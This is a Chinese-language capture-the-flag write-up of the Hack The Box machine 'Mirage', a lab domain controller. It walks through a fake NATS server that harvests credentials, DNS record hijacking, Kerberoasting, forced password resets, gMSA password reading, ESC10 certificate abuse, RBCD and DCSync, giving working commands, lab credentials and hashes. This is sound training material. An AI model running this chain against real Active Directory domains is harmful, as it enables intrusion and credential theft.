HTB-Mirage

2025 年 7 月 25 日 星期五
5

HTB-Mirage

HTB-Mirage

信息收集

nmap -sC -sV 10.10.11.78
nmap -sC -sV 10.10.11.78
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 15:37 CST
Nmap scan report for mirage.htb (10.10.11.78)
Host is up (0.13s latency).
Not shown: 947 closed tcp ports (reset), 39 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-25 14:14:19Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|_  100005  1,2,3       2049/udp6  mountd
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
2049/tcp open  mountd        1-3 (RPC #100005)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h36m19s
| smb2-time: 
|   date: 2025-07-25T14:15:11
|_  start_date: N/A

域控机器,发现开启了nfs,smb,首先对这两个服务进行初步探测

经过测试发现nfs可以匿名挂载,smb无法登陆。

showmount -e 10.10.11.78
image-20250725154546645
image-20250725154546645

把这个目录挂载到本地目录然后查看,两个pdf文件

image-20250725154720244
image-20250725154720244
image-20250725154752633
image-20250725154752633

在pdf中我们可以获取一些信息,新的域名信息nats-svc.mirage.htb,以及他们正在废除ntml使用krb。

有趣的事,这个域名无法解析,找不到服务器。那么我们可以去劫持这个域名,然后伪造一个nfts服务器,这样我们就可以窃取到登陆nf的用户名和密码。

把这个域名绑定到我们本机的ip

nsupdate   
> server 10.10.11.78
> update add nats-svc.mirage.htb 3600 A 10.10.14.3
> send
fakents.py

import socket


print("[+] Fake NATS Server listening on 0.0.0.0:4444")
s = socket.socket()
s.bind(("0.0.0.0", 4222))
s.listen(5)


while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")


    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')
    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode())


    client.close()
image-20250725161611082
image-20250725161611082

获取到一组nats用户密码

CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}

利用凭据获取到更多信息,nats订阅所有信息

nats context add dev-nats \
  --server nats://dc01.mirage.htb:4222 \
  --user Dev_Account_A \
  --password 'hx5h7F5554fP@1337!' \
  --description "Dev access"
nats --context dev-nats sub“>”--count 10
nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit
nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack

最后我们可以获取到一组凭据

"user":"david.jjackson","password":"pN8kQmn6b86!1234@"
image-20250725162439921
image-20250725162439921

测试这个账号能否认证ldap

nxc ldap 10.10.11.78 -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
image-20250725163215045
image-20250725163215045

利用该账号提取bloodhood信息

bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -k -d mirage.htb -ns 10.10.11.78 -c All --zip

分析域内信息关于david.jjackson账户,并没有发现任何可以利用的点。然后查看david.jjackson的spn信息

impacket-GetUserSPNs 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
image-20250725164031558
image-20250725164031558

利用有关于nathan.aadam用户的密码hash,直接利用john破解即可

nathan.aadam/3edc#EDC3
image-20250725164208847
image-20250725164208847

初始shell

利用ccache登陆winrm

获取ccache

impacket-getTGT mirage.htb/nathan.aadam:'3edc#EDC3
image-20250725164538426
image-20250725164538426
image-20250725164421646
image-20250725164421646

至此拿到user.txt

域内横向

利用winpeas手机机器内的信息(这点自己做的时候卡壳了,看了网上wp

允许后会得到一个用户名和密码

mark.bbond:'1day@atime'

在bloodhood分析该用户的权限

image-20250725170430483
image-20250725170430483

该用户对javier有forcechangepassword权限可以直接修改这个用户的密码,然后在利用该账户继续横向。

image-20250725170930482
image-20250725170930482

该账户对mirage-service有readgmspassword权限(ReadGmsPassword 是 Active Directory 中一种特殊的权限,允许特定的用户或计算机账户读取 gMSA(组托管服务账户) 的密码。)

下面就有一条攻击链

修改javier的密码

export KRB5CCNAME=mark.bbond.ccache
因为javier.mmarshall账户是被禁用的先解除禁止
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.10.11.78 remove uac javier.mmarshall -f ACCOUNTDISABLE 
修改密码
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.10.11.78 set password javier.mmarshall '1day@atime'
再去解锁javier的登陆限制
ldapmodify -H ldap://10.10.11.78 -D "mark.bbond@mirage.htb" -w '1day@atime' -f logonhours.ldif
dn: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
changetype: modify
replace: logonHours
logonHours:: ////////////////////////////


然后利用javier.mmarshall账户再去读取GMSAPassword密码
impacket-getTGT mirage.htb/javier.mmarshall:'1day@atime' -dc-ip 10.10.11.78 
nxc ldap 10.10.11.78 -u javier.mmarshall -p 'dayx@atime' --gmsa -k -d mirage.htb --kdcHost dc01.mirage.htb
image-20250725174936963
image-20250725174936963
bloodyAD -k --host dc01.mirage.htb -d 'mirage.htb' -u 'javier.mmarshall' -p '1day@atime' get object 'Mirage-Service$' --attr msDS-ManagedPassword
image-20250725175441029
image-20250725175441029

拿到service的ntlm

获取tgt

impacket-getTGT mirage.htb/Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -dc-ip 10.10.11.78

ECS10

由于service账户没有下一步可执行的操

作,继续信息收集

想要完成ESC10,我们还缺少一个userPrincipalName可控账户,所幸的是Mirage-Service$ 可以修改 mark.bbond 的 userPrincipalName,因为它在 mark.bbond 对象上拥有对 Public-Information (property set) 的 WRITE_PROP 权限,而 UPN 正属于该属性集中的一项。

bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.10.11.78 get object mark.bbond --resolve-sd

ECS10攻击

#修改被控用户的userPrincipalName
export KRB5CCNAME=Mirage-Service$.ccache
certipy-ad account update -username Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -k -no-pass -user mark.bbond -upn 'DC01$@mirage.htb' -dc-host dc01.mirage.htb -target-ip 10.10.11.78 -ns 10.10.11.78 -target dc01.mirage.htb

#请求一个被控用户的User模板
export KRB5CCNAME=mark.bbond.ccache
certipy-ad req -ca 'mirage-DC01-CA' -username mark.bbond -password '1day@atime' -dc-host dc01.mirage.htb -target-ip 10.10.11.78 -ns 10.10.11.78 -target dc01.mirage.htb -k -no-pass

#恢复原值(主线过程不可忽略)
export KRB5CCNAME=Mirage-Service$.ccache
certipy-ad account update -username Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -k -no-pass -user mark.bbond -upn 'mark.bbond@mirage.htb' -dc-host dc01.mirage.htb -target-ip 10.10.11.78 -ns 10.10.11.78 -target dc01.mirage.htb
#开启shell,以DC01权限设置资源委派
└─$ certipy-ad auth -pfx dc01.pfx -dc-ip 10.129.108.73 -ns 10.10.11.78 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'DC01$@mirage.htb'
[*]     Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.10.11.78:636'
[*] Authenticated to '10.10.11.78' as: 'u:MIRAGE\\DC01$'
Type help for list of commands

set_rbcd dc01$ nathan.aadam

Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000

Found Grantee DN: CN=nathan.aadam,OU=Users,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1110

RBCD攻击

impacket-getST -spn 'cifs/DC01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.10.11.78 'mirage.htb/nathan.aadam' -k -no-pass    

1
impacket-secretsdump DCsync攻击
#使用DC01身份发起DCsync攻击
export KRB5CCNAME=dc01\$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache 
impacket-secretsdump -just-dc-user Administrator -k -no-pass dc01.mirage.htb

#获取Administrator账户TGT
impacket-getTGT mirage.htb/Administrators -dc-ip 10.10.11.78 -hashes aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3 -debug

#登录DC01主机
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc01.mirage.htb  -r mirage.htb

使用社交账号登录

  • Loading...
  • Loading...
  • Loading...
  • Loading...
  • Loading...